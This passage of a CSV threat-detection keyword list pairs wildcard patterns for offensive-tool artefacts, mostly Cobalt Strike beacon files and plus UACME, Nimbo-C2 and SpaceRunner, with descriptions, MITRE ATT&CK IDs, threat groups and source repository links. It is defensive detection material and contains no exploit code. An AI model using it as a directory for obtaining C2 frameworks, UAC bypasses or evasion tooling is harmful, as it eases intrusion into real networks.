network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bdllspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bdllspawn*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*Beacon Payload Generator*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*beacon.*winsrv.dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*beacon.CommandBuilder*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*beacon.CommandBuilder*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*beacon.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*beacon.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.nim*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*Beacon.Object.File.zip*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*beacon.ps1*beacon.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*beacon.x64*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.x64*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.x64.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*beacon.x86*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.x86*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_api.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","0","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*beacon_bottom *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Beacon_Com_Struct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_command_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 